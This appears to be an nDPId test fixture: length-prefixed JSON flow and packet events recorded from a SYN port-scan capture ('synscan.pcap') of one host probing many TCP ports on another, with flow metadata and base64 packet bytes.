-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsYZEAAC8Gt+GsEAAIQA2GNIzSBErdUoMYAAAAAGACEAAkRQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsGPMAADIG\/X+sEAAIQA2GNIzSB\/ndUoMYAAAAAGACDAAklgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsISwAACoG\/UasEAAIQA2GNIzTHwLdU4MZAAAAAGACDAANigAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAs7lAAACgGMiKsEAAIQA2GNIzTAE\/dU4MZAAAAAGACBAA0PQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAss2wAADYGXwasEAAIQA2GNIzTEVzdU4MZAAAAAGACDAAbMAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsgd0AACsGm5WsEAAIQA2GNIzTKYTdU4MZAAAAAGACEAD\/BwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAAC4GfTCsEAAIQA2GNIzTIALdU4MZAAAAAGACDAAMigAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsbe0AADkGoYWsEAAIQA2GNIzTAN7dU4MZAAAAAGACCAAvrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsKzEAAC0G8EGsEAAIQA2GNIzTDOTdU4MZAAAAAGACCAAjqAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAslAAAACgGjHKsEAAIQA2GNIzTF3fdU4MZAAAAAGACBAAdFQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAspNwAACUGfpasEAAIQA2GNIzT\/G\/dU4MZAAAAAGACCAA0HAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADcGgnusEAAIQA2GNIzTBGzdU4MZAAAAAGACEAAkIAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAs65MAADUGJ9+sEAAIQA2GNIzTAh\/dU4MZAAAAAGACCAAubQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVAAAC4G9SKsEAAIQA2GNIzTBAbdU4MZAAAAAGACDAAohgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAAC0G6qGsEAAIQA2GNIzTB9PdU4MZAAAAAGACCAAouQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsZcAAADMGr7KsEAAIQA2GNIzTOpvdU4MZAAAAAGACEADt8AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsdvMAADUGnH+sEAAIQA2GNIzTIyndU4MZAAAAAGACCAANYwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060395,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_packet_id":1,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060395,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uAAADMGFpKsEAAIQA2GNIzTBAjdU4MZAAAAAGACEAAkhAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsVEkAADYGvimsEAAIQA2GNIzTBGLdU4MZAAAAAGACDAAoKgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAskKIAACUGktCsEAAIQA2GNIzTACvdU4MZAAAAAGACCAAwYQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsFzgAADYG+zqsEAAIQA2GNIzTBrXdU4MZAAAAAGACDAAl1wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsDqUAADQGBc6sEAAIQA2GNIzTFLLdU4MZAAAAAGACBAAf2gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsEZkAADsG+9msEAAIQA2GNIzToifdU4MZAAAAAGACEACGZAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMwAADsGRKasEAAIQA2GNIzTH5jdU4MZAAAAAGACEAAI9AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsGE4AADUG+ySsEAAIQA2GNIzTF3PdU4MZAAAAAGACCAAZGQAAAgQFtA=="} 